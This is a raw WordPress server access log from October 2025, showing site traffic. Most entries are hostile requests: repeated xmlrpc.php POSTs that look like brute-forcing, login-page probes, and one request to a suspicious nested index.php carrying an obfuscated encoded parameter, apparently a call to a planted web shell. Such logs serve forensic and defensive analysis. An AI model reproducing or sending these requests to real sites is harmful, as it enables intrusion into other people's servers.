193.142.147.5 - - [20/Oct/2025:10:10:28 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:10:29 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:08:03 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937323838332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393238332q3633633231363564623731633433633366383433333062316664613763363565222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
101.53.145.3 - - [20/Oct/2025:10:10:29 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
85.208.96.194 - - [20/Oct/2025:10:10:30 -0400] "GET /tag/diabetic-food-list/ HTTP/2.0" 200 149509 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:10:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.74.116.73 - - [20/Oct/2025:10:10:33 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:10:33 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:10:34 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
